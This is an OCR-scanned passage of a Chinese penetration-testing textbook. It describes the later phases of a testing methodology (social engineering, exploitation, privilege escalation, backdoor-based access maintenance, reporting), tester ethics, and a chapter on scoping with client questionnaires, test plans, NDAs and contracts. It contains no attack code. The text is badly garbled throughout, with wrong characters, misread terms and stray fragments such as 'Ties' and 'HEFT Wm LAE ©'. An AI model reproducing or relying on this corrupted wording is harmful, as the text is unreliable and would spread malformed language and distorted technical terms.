来 ， 审 计 人 员 对 目标 系统 的 认 知 就 会 更 为 清晰 、 透 彻 ， 并 能 够 仔细 地 检 
查 任何 已 知 和 未 知 的 源 洞 。 否 则 ， 说 遗漏 的 漏洞 将 会 一 直 残 留 在 目标 网 
络 系统 里 。 





2.5.6 社会 工程 学 


如 果 目 标 网 络 没有 直接 的 入 口 ， 欺 骗 的 艺术 将 起 到 抛砖引玉 的 重要 
作用 。 对 目标 组 织 中 的 人 员 进 行 定 问 攻 击 ， 很 有 可 能 帮助 我 们 找到 渗透 
目标 系统 的 入 口 。 例 如 ， 诱 使 用 户 运 行 会 安装 后 门 的 恶意 程序 ， 就 可 能 
为 审计 人 员 的 渗透 工作 形成 突破 。 社 会 工程 学 渗透 分 为 多 种 不 同 实现 形 











式 。 伪 装 成 网 络 管理 员 ， 通 过 电话 要 求 用 户 提 供 上 自己 的 账户 信息 ; 发 送 
钓鱼 邮件 来 劫持 用 户 的 银行 账户 ;甚至 是 诱 使 东 人 出 现在 茶 个 地 点 一 一 
这 些 都 属于 社会 工程 学 攻击 。 在 社会 工程 学 中 ， 达 成 同一 既定 目标 的 实 
现 方式 应 有 尺 有 。 和 需要 注意 的 是 ， 在 对 目标 实施 欺骗 以 达成 渗透 目标 之 
前 ， 多 数 情况 下 需要 长 时 间 研 究 目 标 人 员 的 心理 。 另 外 ， 在 开展 这 个 阶 
段 的 工作 之 前 ， 您 需要 事先 研究 国内 的 法 律 是 否 有 关于 社会 工程 学 的 相 
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在 仔细 检查 和 发 现 目标 系统 中 的 漏洞 之 后 ， 就 可 以 使 用 已 有 的 漏洞 
利用 程序 对 目标 系统 进行 渗透 。 某 些 情况 下 不 得 不 对 漏洞 利用 程序 
(exploit〉 进 行 额外 的 研究 和 修改 ， 否 则 它 可 能 就 无 法 正常 工作 。 虽 然 
这 听 起 来 束 很 抹 烦 ， 但 是 先进 的 漏洞 利用 (修改 ) 工具 可 使 这 项 工作 容 
易 得 多 ， 而 且 Kali Linux 已 经 收录 了 这 种 工具 。 此 外 ， 审 计 人 员 可 以 把 
客户 疹 漏 洞 利用 程序 和 社会 工程 学 进行 结合 ， 进 而 控制 目标 系统 。 这 个 
阶段 的 主要 任务 是 控制 目标 系统 。 整 个 流程 可 以 分 为 3 步 ， 涉 及 攻击 
前 、 攻 击 、 攻 击 后 的 相关 行动 。 

2.5.8 提升 权限 

获取 目标 系统 的 控制 权 是 渗透 成 功 的 标志 。 接 下 来 ， 审 计 人 员 束 可 
以 依据 其 所 拥有 的 访问 权限 ， 在 被 测 系统 中 上 自由 发 挥 。 审 计 人 员 也 可 以 
使 用 适用 于 目标 系统 的 本 地 漏洞 来 提升 自己 的 权限 。 只 要 他 们 能 够 在 目 
标 系统 上 运行 提 权 漏洞 利用 程序 ， 就 可 以 获得 主机 上 的 超级 用 户 权限 或 
者 系统 级 权限 。 审 计 人 员 还 可 以 以 该 主机 为 跳板 ， 进 一 步 攻击 局 域 网 
络 。 根 据 之 前 对 渗透 范围 的 界定 ， 审 计 人 员 接 下 来 会 开展 的 攻击 可 能 是 
受 限 制 的 ， 也 可 能 是 不 受 限 的 。 而 后 ， 他 们 很 有 可 能 以 各 种 方式 获得 与 

















络 数据 包 ， 破 解 各 种 服务 的 密码 ， 在 局 域 网 络 中 使 用 网 络 其 驴 手 段 。 所 
以 说 ， 提 升 权 限 的 最 终 目 的 是 获得 目标 系统 的 最 高 访问 权限 。 
2.5.9 访问 维护 

多 数 情况 下 ， 审 计 人 员 需 要 在 一 段 时 间 内 维护 他 们 对 目标 系统 的 访 
问 权 限 。 例 如 ， 在 演示 越权 访问 目标 系统 的 时 候 ， 安 装 后 门将 节省 重新 
渗透 目标 系统 所 耗费 的 大 量 时 间 。 这 些 情况 下 ， 访 问 维护 将 节约 获取 目 
标 系 统 访问 权限 所 需要 的 时 间 、 花 费 和 资源 。 审 计 人 员 可 以 通过 一 些 秘 
密 的 通信 隧道 ， 在 既定 时 间 内 维持 对 目标 的 访问 权限 。 这 些 隧 道 往 往 基 
于 特定 协议 、 代 理 或 者 点 对 点 通信 方法 的 后 门 程序 。 这 种 对 系统 的 访问 
方法 可 以 清楚 地 展示 ， 入 侵 人 员 在 目标 系统 实施 攻击 时 隐匿 行踪 的 具体 
Ties 





























2.5.10 文档 报告 

在 渗透 测试 的 最 后 一 个 环节 里 ， 审 计 人 员 要 记录 、 报 告 并 现场 演示 
那些 已 经 识别 、 验 证 和 利用 了 的 安全 漏洞 。 被 测 单位 的 管理 和 技术 团队 
会 检查 渗透 时 使 用 的 方法 ， 并 会 根据 这 些 文档 修补 所 有 存在 的 安全 漏 
洞 。 所 以 从 道德 角度 来 看 ， 文 档 报 告 的 工作 十 分 重要 。 为 了 帮助 惯例 人 
员 和 技术 人 员 共 同 理解 、 分 析 当 前 IT 基础 架构 中 的 薄弱 环节 ， 可 能 需要 
给 不 同 的 部 门 撰写 不 同 措辞 的 书面 报告 。 此 外 ， 这 些 报告 还 可 以 用 来 获 
取 和 比较 渗透 测试 前 后 目标 系统 的 完整 性 。 


2.6 道德 准则 


专业 的 、 道 德 的 、 经 过 授权 的 安全 测试 服务 ， 离 不 开 由 事先 约定 的 
规则 所 组 成 的 安全 测试 道德 准则 。 这 些 准 则 约定 了 安全 测试 服务 的 服务 
方式 、 安 全 实施 的 测试 方法 、 合 同和 谈判 所 约定 的 法 律 条 款 、 测 试 的 范 
图 、 测 试 的 准备 、 测 试 的 流程 ， 以 及 报告 结构 的 一 致 性 。 要 顾全 上 述 因 














素 ， 就 要 仔细 地 考察 、 设 计 在 整个 测试 过 程 中 都 要 送 循 的 正规 的 操作 方 
法 和 相关 流程 。 下 面 将 介绍 一 些 常 见 的 到 的 准则 。 

e 审计 人 员 不 得 在 和 客户 达成 正式 协议 之 前 对 目标 系统 进行 任何 形 
式 的 渗透 测试 。 这 种 不 道德 的 营销 方法 有 可 能 破坏 客户 的 正常 业务 。 在 
茶 些 国家 或 地 区 ， 这 种 行为 其 至 可 能 是 违法 行为 。 

e 在 测试 过 程 中 ， 在 没有 得 到 客户 明确 许可 的 情况 下 ， 测 试 人 员 不 
得 进行 超出 测试 范围 越过 已 约定 范畴 的 安全 测试 。 

e 具有 法 律 效力 的 正式 合同 可 帮助 测试 人 员 避 免 承 担 不 必要 的 法 律 
责任 。 正 式 合同 将 会 约定 哪些 渗透 行为 属于 免责 范围 。 这 份 合同 必须 清 
楚 地 说 明 测 试 的 条 球 和 条 件 、 紧 急 联系 信息 、 工 作 任 务 声 明 以 及 任何 明 
显 的 利益 冲突 。 

e. 测试 人 员 应 当 亲 守 测 试 计划 所 明确 的 安全 评估 的 时 间 期 限 。 渗 透 
测试 的 时 间 应 当 避 开 正 常生 产业 务 的 时 间 段 ， 以 避免 造成 相互 影响 。 

e. 测试 人 员 应 当 遵 循 在 测试 流程 里 约定 的 必要 步 怠 。 这 些 规 则 以 技 
术 和 管理 不 同 角度 ， 通 过 内 部 环境 和 相关 人 员 来 制约 测试 的 流程 。 

e 在 范围 界定 阶段 ， 应 当 在 合同 书 里 明确 说 明 安 全 评 佑 业务 涉及 到 
的 所 有 实体 ， 以 及 他 们 在 安全 评估 的 过 程 中 受到 哪些 制约 。 

e 测试 结 有 末 和 书面 报告 必须 清晰 ， 其 顺序 必须 一 致 。 报 告 中 提 及 的 
所 有 已 知 的 和 未 知 的 漏洞 ， 必 须 以 安全 保密 的 方式 递交 给 有 权 奏 看 报告 
的 相关 责任 人 。 
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本 章 详 细 介 绍 了 多 种 渗透 测试 方法 论 ， 以 及 渗透 测试 的 基本 术语 、 
相关 类 型 ， 还 有 这 些 术 语 和 业内 其 他 术语 之 间 的 区 别 。 本 章 的 重点 内 容 
如 下 。 


© ”渗透 测试 可 分 为 黑 盒 测试 和 日 盒 测 试 。 黑 盒 测试 也 称 为 外 部 测 





试 ， 在 黑 盒 测 试 中 ， 审 计 人 员 事 先 不 了 解 目 标 系 统 的 内 部 结构 或 任何 技 
术 。 白 盒 测试 也 叫 内 部 测试 ， 在 白 盒 测 试 中 ， 审 计 人 员 了 解 目 标 系 统 的 
全 部 细节 。 结 合 黑 盒 测 试 和 和 白 盒 测试 的 测试 类 型 ， 称 做 灰 盒 测试 。 

e 脆弱 性 评估 和 渗透 测试 最 基本 的 不 同 点 在 于 : 脆弱 性 评估 旨 在 找 
出 目标 系统 中 存在 的 安全 漏洞 ， 并 不 会 去 衡量 这 些 漏洞 可 能 造成 的 相应 
危害， 而 渗透 测试 会 进一步 利用 这 些 漏 洞 ， 发 起 实质 性 攻击 以 评估 它们 
可 能 造成 的 安全 问题 。 

e 虽然 业内 有 很 多 安全 测试 方面 的 方法 论 ， 但 是 在 评测 网 络 系统 或 
应 用 程序 安全 性 方面 ， 只 有 极 少数 的 方法 论 才能 够 具有 阶段 性 的 循序 浙 
进 的 指导 意义 。 本 章 介 绍 了 5 个 非常 有 名 的 开源 安全 评估 方法 论 ， 突 出 
了 它们 的 技术 功能 、 主 要 特征 和 优势 。 这 5 个 方法 论 分 别 是 开源 安全 测 
试 方法 论 ( OSSTMM ) 、 信 息 系 统 安全 评估 框架 CISSAF) 、 开 放 式 
Web 应 用 程序 安全 项 目 COWASPO ， 渗 透 测 试 执 行 标准 (PTES) 以 及 
Web 应 用 安全 联合 威胁 分 类 CWASC-TC) 。 

e 本 章 还 介绍 了 一 个 简单 的 结构 化 的 通用 测试 方法 论 。 它 由 安全 测 
试行 业 标 准 方法 归纳 而 来 ， 分 为 多 个 标准 化 测试 阶段 。 这 些 阶段 分 为 : 
范围 界定 、 信 息 收 集 、 目 标识 别 、 服 务 枚 举 、 漏 洞 映 射 、 社 会 工程 学 、 
漏洞 利用 、 提 升 权 限 、 访 问 维护 、 文 档 报告 。 

e 最 后 ， 本 章 讨论 了 在 整个 安全 评估 过 程 中 必须 遵守 的 渗透 测试 道 
德 准 则 。 在 安全 评估 的 各 个 阶段 落实 有 关 道 德 准 则 ， 可 以 切实 保障 审计 
人 员 和 商业 实体 双方 的 各 自 利益 。 

在 接 到 一 个 渗透 测试 任务 时 ， 如 何 从 客户 那里 获取 相关 信息 ， 又 如 
何 对 信息 进行 管理 ?请 参见 下 一 章 。 
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范围 界定 (Target Scoping) 是 收集 被 测 单 位 的 评估 项 目 需求 的 经 验 
过 程 。 这 个 阶段 的 工作 把 评估 项 目的 每 一 个 需求 参数 都 落实 到 项 目的 测 
试 计 划 、 限 定 因素 、 业 务 指标 和 进度 安排 中 。 该 流程 则 在 明确 安全 评估 
项 目的 具体 目标 ， 对 整个 项 目 起 着 举足轻重 的 重要 作用 。 待 明确 项 目的 
关键 目标 之 后 ， 评 估 人 员 就 可 以 整理 出 工作 路 线 图 。 这 份 路 线 图 会 涵盖 
测试 目标 、 测 试 方式 、 所 需 资 源 、 限 制 因素 、 业 务 指标 ， 以 及 项 目的 计 
划 和 调度 安排 。 我 们 把 上 述 这 些 要 素 统 称 为 评估 项 目的 范围 界定 流程 
(scope process) 。 本 章 将 介绍 与 之 有 关 的 几 个 概念 ， 分 别 如 下 。 

e 收集 需求 〈gathering client requirements) : 以 口头 交流 或 书面 询 
问 的 形式 ， 积 累 目 标 环境 的 有 关 信 息 。 

e 筹划 工作 (preparing test plan) : 测试 计划 的 准备 工作 受 许多 因 
素 的 有 影响。 这些 因素 包括 : 结构 化 测试 流程 按照 实际 需求 进行 的 相应 调 
整 、 合 同和 协议 、 成 本 分 析 以 及 资源 分 配 。 

e 边界 分 析 (profiling test boundaries) : 明确 渗透 测试 任务 限制 因 
素 的 工作 。 这 些 限制 因素 可 能 来 自 于 技术 上 的 限制 、 信 息 方面 的 限制 或 
者 是 客户 IT 规章 条 例 里 的 有 关 要 求 。 

e 明确 业务 指标 (defining business objectives) : 在 渗透 测试 项 目 
中 ， 该 阶段 工作 使 技术 目标 与 业务 目标 保持 一 致 。 

e 项 目 管 理 和 统筹 调度 (project management and scheduling) : 1% 
项 工作 旨 在 使 渗透 测试 过 程 中 的 每 个 步骤 与 其 他 步骤 形成 时 间 上 的 配 
合 。 很 多 些 先进 的 项 目 管理 工具 ， 都 可 以 用 做 项 目 管理 和 项 目 调度 的 工 
R. 
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为 了 保证 测试 结果 的 一 臻 性， 提高 测试 工作 的 成 功 几 紊 ， 强 烈 建 议 





您 遵循 评估 项 目的 范围 界定 流程 。 此 外 ， 您 也 可 以 根据 实际 情况 和 测试 
要 素 对 该 流程 进行 调整 。 如 果 脱 离 范 围 界 定 流 程 ， 收 集 到 的 需求 将 不 够 
人 确切， 工作 的 流程 难以 合理 ， 而 这 都 可 能 会 导致 测试 项 目的 最 终 失 败 。 
这 不 仅 会 危及 整个 渗透 测试 项 目的 成 败 ， 并 且 有 可 能 会 意外 中 断 被 测 单 
位 的 正常 业务 。 充 分 重视 范围 界定 阶段 的 工作 ， 会 给 后 续 各 阶段 的 工作 
市 来 极 大 的 帮助 ， 并 且 有 助 于 明确 技术 方面 和 管理 方面 的 有 关 需 求 。 范 
图 界定 的 关键 在 于 ， 要 在 开始 渗透 之 前 尽 可 能 的 从 客户 那里 收集 信息 ， 
以 形成 一 个 充分 满足 客户 各 个 层面 需求 的 渗透 测试 策略 。 这 一 末 略 应 能 
顾全 法 律 条 球 、 合 同 协 议 、 资 源 分 配 、 测 试 限制 、 核 心 苋 争 力 、 基 础 设 
施 信息 、 时 间 指 标 以 及 规则 约定 。 渗 透 测 试 的 最 佳 实践 表明 ， 唯 有 遵循 
范围 界定 流程 ， 在 这 一 阶段 解决 所 有 必要 的 问题 ， 才 是 局 动 渗透 测试 项 
目的 专业 方式 。 

范围 界定 流程 的 各 个 步骤 负责 生成 不 同类 型 的 信息 。 为 了 保障 渗透 
测试 的 最 终 成 功 ， 范 围 界 定 流 程 按照 逻辑 的 顺序 把 这 些 步 骤 有 机 地 组 合 
成 一 体 。 我 们 也 要 在 这 个 阶段 尽早 地 处 理 好 与 法 律 有 关 的 问题 。 在 本 章 
后 续 的 小 节 里 ， 我 们 将 详细 解释 这 些 阶 段 的 各 个 步骤 。 请 注意 ， 如 采 能 
够 条 例 清晰 地 整理 好 所 有 收集 到 的 信息 ， 那 么 客户 和 渗透 测试 顾问 都 能 
够 深入 理解 安全 测试 的 工作 过 程 。 








3.1 收集 需求 
这 一 步 通常 以 问卷 调查 的 形式 从 客户 那里 收集 目标 基础 设施 的 所 有 
相关 信息 。 接 受 问 卷 调查 的 对 象 可 以 是 经 被 测 单位 正式 授权 的 个 人 和 业 


务 伙伴 。 因 此 ， 要 保证 顺利 完成 渗透 测 斌 项目， 关键 是 要 在 项 目的 早期 
找到 所 有 内 部 和 外 部 的 干系 人 “(stake holder) ， 尽 早 分 析 他 们 对 项 目的 
关注 程度 、 期 望 程度 、 重 要 程度 和 影响 程度 。 然 后 ， 依 据 各 个 干系 人 的 
需求 和 参与 程度 制定 测试 策略 ， 以 在 最 大 限度 地 发 挥 渗透 测试 的 正面 影 











啊 的 同时 ， 尽 可 能 地 避免 潜在 的 负面 影响 。 

在 开展 工作 之 前 ， 事 先 验证 合同 缔约 方 的 真实 号 份 是 测试 人 员 的 员 
任 ， 而 不 是 被 测 单位 的 贡 任 。 

收集 需求 的 基本 作用 是 : 帮助 渗透 测试 人 员 通 过 真实 可 信 的 渠道 获 
取 测 试 工作 所 需 的 必要 信息 。 妆 完成 明确 需求 的 工作 之 后 ， 应 把 测试 需 
求 分 析 书 交 给 客户 审查 ， 以 免 受到 错误 信息 的 误导 。 审 查 步 又 可 以 保证 
最 终 测 试 结果 的 一 致 性 和 完整 性 。 

















我 们 整理 出 部 分 常见 问题 ， 这 些 问 题 可 以 用 作 常 规 客 户 需 求 调查 问 
卷 的 制作 基础 。 需 要 注意 的 是 ， 您 需要 根据 客户 的 需求 扩展 或 精简 其 中 
的 问题 。 

e 收集 公司 的 基本 信息 ， 例 如 公司 名 称 、 注 册 地 址 、 企 业 网 站 、 联 
络 人 的 详细 资料 、 电 子 邮 件 地 址 以 及 电话 号 人 码 。 

e 了 解 客户 启动 渗透 测试 项 目的 主要 动机 。 

e 确定 渗透 测试 的 具体 类 型 (包含 或 者 不 包含 特定 标准 )。 

o 黑 盒 测试 

o 白 盒 测试 

o 外 部 测试 

o 内 部 测试 

o 需要 进行 社会 工程 学 测试 

o 不 进行 社会 工程 学 测试 

o 调查 员工 背景 信息 

o 使 用 伪造 的 员工 信息 进行 测试 〈 可 能 需要 咨询 律师 ) 

o 进行 DoS 〈 拒 绝 服务 攻击 ) 测试 

o 不 进行 DoS 测试 

o 渗透 业务 合作 伙伴 的 系统 

















e 测试 项 目 涉 及 多 少 服务 器 、 工 作 站 和 网 络 设备 ? 

e 基础 设施 架构 文 持 什 么 操作 系统 技术 ? 

e 需要 测试 什么 类 型 的 网 络 设备 ? 防火墙、 路由器、 交换 机 、 调 制 
解 调 器 、 负 载 平 衡器 、IDS、IPS， 还 是 其 他 类 型 的 硬件 设备 ? 

e 是 否 有 灾难 恢复 计划 ?如果 有 ， 谁 是 测试 人 员 应 当 联 系 的 紧急 联 
系 人 ? 





有 在 岗 的 网 络 管理 员 ? 
要 遵循 什么 特定 的 工业 标准 ? 如 果 有 ， 请 列 出 来 。 
e 当前 渗透 测试 项 目的 联络 人 是 谁 ? 

e 这 个 项 目的 时 间 周 期 是 多 久 ? 

e 这 个 项 目的 预算 是 多 少 ? 

e 如 果 必 要 ， 应 全 面 掌握 客户 在 其 他 方面 的 需求 。 


日 
eet 
E 
e 是 合击 








下 述 列表 是 可 交付 成 果 的 需求 调查 表 (deliverable assessment 
form) 。 这 个 调查 表 的 内 容 并 不 全 面 ， 您 应 该 根据 客户 的 需求 进行 相应 
添 增 或 删 减 。 

e 您 期 望 得 到 哪 种 类 型 的 报告 ? 

o 执行 报告 

o 技术 评估 报告 

o 开发 人 员 报 告 

e 您 希望 项 目 报告 采用 哪 种 文件 格式 ? PDF, HTML 还 是 DOC。 

e 提交 报告 的 方式 ， 应 当 是 加 密 邮件 还 是 纸 质 文档 ? 

e 负责 收取 这 些 报告 的 黄 任 人 是 谁 ? 

o 员工 

o 股东 

o FA 














这 种 简洁 而 全 面 的 调查 表 ， 有 助 您 守 不 费力 地 掌握 客户 的 需求 ， 有 
助 于 顺利 完成 测试 计划 。 
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在 收集 完 客户 需求 并 由 客户 验证 过 这 些 需 求 之 后 ， 束 可 开始 正式 测 
试 计 划 的 准备 工作 。 测 试 计 划 必 须 能 够 反映 客户 的 全 部 需求 ， 应 能 全 面 
解决 测试 工作 在 法 律 和 商业 领域 会 涉及 的 各 种 问题 。 筹 划 测 试 工 作 的 有 
关 计 划 ， 关 键 是 要 制定 一 种 严谨 的 测试 流程 ， 解 决 好 人 员 配置 、 成 本 分 
析 、 保 密 协 议 、 渗 透 测试 合同 以 及 操作 规则 的 问题 。 下 面 将 具体 讨论 这 
HEFT Wm LAE © 
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能 需要 适度 调整 现 有 的 测试 方法 论 。 例 如 ， 如 果 客 户 不 希望 进行 社会 工 
程 学 测试 ， 那 么 正式 的 测试 流程 就 不 得 有 该 项 测试 。 有 些 人 把 这 种 调整 
工作 称 为 测试 过 程 验证 (Test Process Validation) 。 这 种 调整 工作 往往 
需要 进行 多 次 ; 每 当 客 户 改动 了 他 们 的 需求 ， 测 试 人 员 都 需要 重新 进行 
相应 的 调整 工作 。 如 果 测 试 计划 里 包含 任何 客户 需求 范围 之 外 的 测试 ， 
将 有 可 能 违反 单位 的 制度 ， 甚 至 造成 严重 后 果 。 此 外 ， 测 试 人 员 通 党 还 
要 按照 测试 类 型 的 区 别 对 测试 流程 进行 一 定 的 调整 。 例 如 ， 白 盒 测 试 的 
测试 计划 就 不 应 该 包含 信息 收集 和 目标 识别 的 相关 阶段 ， 因 为 测试 人 员 
事前 能 够 掌握 目标 内 部 架构 的 详细 情况 。 

无 论 进行 何 种 类 型 的 测试 ， 测 试 人 员 都 应 当 验 证 网 络 信息 和 实际 环 
境 。 毕 竟 ， 客 户 自己 可 能 并 不 知道 他 们 的 网 络 结构 到 底 是 什么 情况 。 

e 人 员 配 置 : 测试 人 员 的 知识 结构 和 专业 水 准 是 影响 测试 工作 成 败 
的 重要 因素 之 一 。 因 此 ， 为 既定 任务 指定 一 名 水 平 相当 的 专业 渗透 测试 
人 员 ， 可 提高 安全 评估 结果 的 质量 。 例 如 ， 要 开展 针对 应 用 程序 的 渗透 
任务 ， 我 们 就 需要 应 用 安全 方面 的 测试 人 员 。 这 项 工作 对 于 渗透 测试 任 

















务 的 成 功 完成 具有 非常 重要 的 作用 。 

e 成 本 分 析 : 渗透 测试 的 成 本 取决 于 很 多 因素 。 可 能 影响 成 本 的 因 
RUM: 分 配给 整个 项 目的 天 数 、 客 户 要 求 的 额外 服务 〈 如 社会 工程 学 
和 物理 安全 评估 ) 、 评 佑 特定 技术 所 要 求 的 专业 能 力 。 以 行业 的 观点 来 
看 ， 成 本 取决 于 测试 项 目的 性 质 〈 种 类 ) 和 数量 《工作 量 ) 。 

e 保密 协议 (Non-disclosure Agreement, NDA) : 在 渗透 测试 开始 
之 及 ， 人 合同 双方 需要 签订 符合 双方 利益 的 协议 。 这 份 保密 协议 用 来 明确 
测试 工作 中 各 方 应 该 苯 循 的 条 球 和 条 件 。 在 整个 测试 过 程 中 ， 渗 透 测 试 
人 员 必 须 亲 守 这 些 条 球 。 违 反 保密 协议 任何 条 例 的 贡 任 人 都 将 受到 严 
惩 ， 甚 可 能 因此 失去 工作 。 

e 涂 透 测试 合同 : 客户 和 渗透 测试 人 员 之 间 的 所 有 技术 事宜 和 业务 
事宜 ， 都 应 落实 为 书面 合同 。 这 类 合同 主要 约定 测试 服务 的 具体 内 容 、 
服务 的 主要 目标 、 测 试 方法 、 收 费 标准 ， 虽 在 维护 整个 项 目的 保密 性 。 
因为 这 种 合同 全 面 影 响 您 的 渗透 测试 活动 ， 所 以 建议 您 聘请 专业 律师 或 
法 律 顾问 起 草 这 类 合同 。 

e 操作 规则 : 因为 渗透 测试 可 能 形成 实质 性 的 攻击 ， 所 以 测试 人 员 
必须 清楚 地 理解 评估 的 需求 、 客 己 配合 的 范围 ， 以 及 每 种 评估 技术 可 能 
会 造成 的 影响 或 后 果 。 此 外 ， 渗 透 测 试 涉及 的 测试 工具 必须 配 有 明确 的 
用 途 说 明 ， 以 便 测试 人 员 可 进行 相应 的 选择 。 操 作 规 则 非常 详细 地 明确 
了 上 述 所 有 内 容 ， 是 测试 人 员 在 测试 过 程 中 必须 遵循 的 技术 规范 。 这 一 
规则 的 制定 依据 是 事先 测算 好 的 资产 收益 率 ROE)〉 。 测 试 人 员 不 得 越 
过 该 规则 所 明确 的 行为 界限 。 

通过 测试 计划 的 上 述 各 项 准备 工作 ， 您 能 够 保证 渗透 测试 流程 的 统 
一 性 。 这 也 有 助 于 测试 人 员 依 据 客户 需求 确定 出 评估 计划 里 的 更 多 细 
节 。 我 们 同时 建议 您 事先 准备 好 测试 计划 检查 清单 ， 以 验证 评估 条 球 和 
有 关 指 标 。 

测试 计划 检查 清单 























在 开始 范围 界定 的 后 续 工 作 之 前 ， 应 当 检查 一 下 您 是 含 完成 了 先前 
阶段 的 任务 。 此 时 ， 您 可 以 参考 下 述 这 个 清单 。 

e 是 否 满足 了 客户 需求 建议 书 (RFP) 的 所 有 需求 ? 

e 是 否 清 晰 地 描述 了 测试 范围 ? 

e 是 人 否 已 经 明确 了 所 有 参与 测试 的 有 关 单 位 ? 

e 和 是否 己 经 单独 列 出 了 所 有 不 参与 测试 的 单位 ? 

e 和 是否 需要 遵循 特定 的 测试 流程 ? 

e 和 是否 正确 拟定 了 训 试 流程 ? 

e 测试 完成 后 能 人 否 交 付 相 应 的 预期 成 果 ? 

e 古人 否 书面 描述 、 研 究 过 整个 测试 环境 ? 

e 是 否 给 所 有 的 测试 项 目 都 制定 了 相应 的 角色 和 职责 ? 

e 在 涉及 特定 技术 的 评估 工作 中 ， 是 否 会 涉及 第 三 方 承 包 商 ? 

e 有 没有 采取 让 项 目 能 够 完美 结束 的 措施 ? 

e 对 方 是 否 有 灾难 恢复 计划 ? 

e 是 否 已 经 正式 测算 过 整个 项 目的 成 本 ? 

e 是 否 已 经 找到 了 批准 测试 计划 的 责任 人 ? 

e 是 否 已 经 找到 了 接受 渗透 测试 的 贡 任 人 ? 





3.3 测试 边界 分 


客户 提出 的 项 目 需 求 ， 可 能 有 意 或 无 意 地 提示 出 被 测 环境 的 局 限 条 
件 和 测试 边界 。 这 些 局 限 条 件 和 测试 边界 ， 可 分 为 技术 上 的 、 知 识 上 的 
或 者 由 客户 设 定 的 正规 限制 。 因 为 这 些 约束 条 件 可 能 会 对 测试 造成 重大 
影响 ， 所 以 测试 人 员 得 通过 其 他 可 行 方案 规避 这 些 问题 。 必 须 注意 的 
是 ， 有 些 限制 是 无 法 通融 或 修改 的 ， 因 为 客户 要 通过 这 些 限 制 来 管控 整 
个 渗透 测试 的 过 程 。 下 文 将 会 介绍 常见 的 限制 类 型 和 相应 的 案例 。 

e 技术 限制 : 在 定义 了 合适 的 测试 边界 之 后 ， 审 计 人 员 可 能 发 现 日 











标 网 络 基础 设施 中 使 用 了 一 种 无 法 测试 的 新 型 技术 ， 这 种 类 型 的 限制 惑 
是 技术 限制 。 发 生 这 种 情况 的 原因 是 缺乏 评估 这 种 新 技术 的 渗透 测试 工 
有 具 。 例 如 ，XYZ 公 司 引 进 了 一 球 性 能 优 寞 的 GZ 型 网 络 防 火 墙 ， 他 们 把 
GZ 部 署 在 网 络 入 口 以 保护 整个 内 部 网 络 。 然 而 ，GZ 防 火 墙 运用 的 专利 
技术 ， 导 致 了 现 有 的 任何 一 丈 防 火 增 评 估 工 具 都 无 法 评估 该 产品 。 因 
此 ， 测 试 单位 需要 及 时 更 新 解决 方案 ， 以 解决 新 技术 融 来 的 评估 障碍 。 

e 知识 限制 : 渗透 测试 人 员 在 知识 能 力 方 面 的 局 限 会 对 整个 项 目 产 
生 负 面 影响 。 例 如 ， 专 门 从事 数 据 库 渗 透 的 测试 人 员 ， 无 法 负 贡 网 络 基 
础 设施 的 物理 安全 评估 。 因 此 ， 为 了 顺利 完成 项 目 任 务 ， 最 好 能 够 依据 
人 员 的 知识 结构 和 技能 水 平分 配 他 们 相应 的 角色 和 职责 。 

e 基础 设施 有 关 的 其 他 方面 的 限制 : 为 了 控制 评估 的 实施 过 程 ， 客 
户 也 可 能 会 添加 特定 的 测试 限制 。 为 了 实现 这 种 控制 ， 他 们 可 能 会 限制 
测试 人 员 仅 接触 那些 需要 被 评估 的 网 络 设备 和 技术 ， 而 不 让 他 们 接触 TT 
基础 设施 的 其 他 部 分 。 通 常 ， 需 求 收集 阶段 的 工作 应 能 明确 这 些 限制 。 
例如 ， 客 户 可 能 会 要 求 测试 网 段 A 里 的 所 有 设备 ， 但 是 他 们 还 会 同时 要 
求 不 得 测试 第 一 个 路 由 器 。 客 户 需 求 里 的 这 种 限制 ， 会 无 法 衡量 第 一 个 
路 由 器 的 安全 性 ， 即 使 彻底 检查 了 网 络 里 的 其 他 所 有 设备 并 保证 了 其 安 
全 ， 还 是 这 个 路 由 器 的 问题 很 有 可 能 引发 整个 网 络 的 安全 事故 。 Al 
此 ， 在 接受 这 类 限制 之 前 ， 必 须 认真 地 考虑 全 局 问题 。 

评估 人 员 务 必 在 用 户 需 求 收集 阶段 ， 仔 细 观 坚 、 深 入 分 析 所 有 的 局 
限 条 件 和 限制 要 求 。 优 秀 的 渗透 测试 人 员 应 能 仔细 分 辨 每 一 个 相关 需 
求 ， 应 能 与 客户 进行 讨论 ， 取 消 或 者 改变 所 有 可 能 造成 测试 流程 意外 中 
呆 ， 或 者 造成 测试 结果 歧义 的 限制 。 虽 然 本 质 上 说 ， 无 法 规避 某 些 技术 
上 的 限制 ， 而 且 需 要 额外 的 时 间 来 开发 元 服 相应 限制 的 测试 方案 ， 但 是 
引入 高 水 平 的 测试 人 员 ， 使 用 先进 的 测试 工具 和 技术 ， 也 可 能 克服 这 些 
限制 。 


























3.4 定义 业务 指标 


在 明确 评估 需求 和 签署 服务 协议 之 后 ， 下 一 步 工作 就 是 定义 业务 指 
标 。 这 将 保证 测试 结果 能 够 给 客户 的 业务 带 来 各 个 方面 的 好 处 。 每 一 项 
业务 指标 都 对 应 着 相应 的 评估 需求 ， 把 安全 评估 的 成 果 展 现 为 业务 的 业 
绩 。 我 们 整理 出 一 些 普 衣 适用 于 各 类 渗透 测试 项 目的 业务 指标 。 然 而 ， 
您 也 可 能 根据 客户 的 需求 重新 设计 这 份 清单 。 这 个 工作 十 分 重要 ， 审 计 
人 员 应 当 能 够 观察 、 理 解 客 户 的 业务 出 发 点 ， 在 测试 前 、 测 试 中 、 测 试 
后 都 满足 最 低 程 度 的 指标 。 管 理 团 队 和 技术 团队 通力 合作 ， 以 保证 业务 
可 靠 性 为 命题 ， 以 增强 信息 系统 安全 性 为 着 手 点 ， 共 同 制定 业务 指标 。 
无 论 何 种 类 型 的 安全 评估 项 目 ， 均 可 参考 下 述 这 个 通用 的 业务 指标 。 

e 通过 常规 安全 检查 ， 提 高 企业 形象 和 业内 认可 程度 。 

e 以 保证 业务 完整 性 为 契机 ， 达 到 必要 的 标准 和 规范 。 

e 提高 存 有 客户 、 员 工 和 其 他 业务 单位 信息 的 机 要 系统 的 安全 性 。 

e 在 网 络 基 础 设施 中 排查 现 有 的 威胁 和 已 知 漏洞 ， 协 助 建立 安全 制 
度 以 及 可 对 抗 已 知 和 未 知 风 险 的 工作 流程 。 

e 提供 一 个 可 平滑 过 渡 的 、 健 全 的 业务 组 织 架 构 ， 从 而 使 合作 伙伴 
和 客户 能 够 受益 。 

e 把 维护 IT 基础 设施 安全 性 的 费用 降 到 最 低 。 安 全 评估 业务 可 衡 
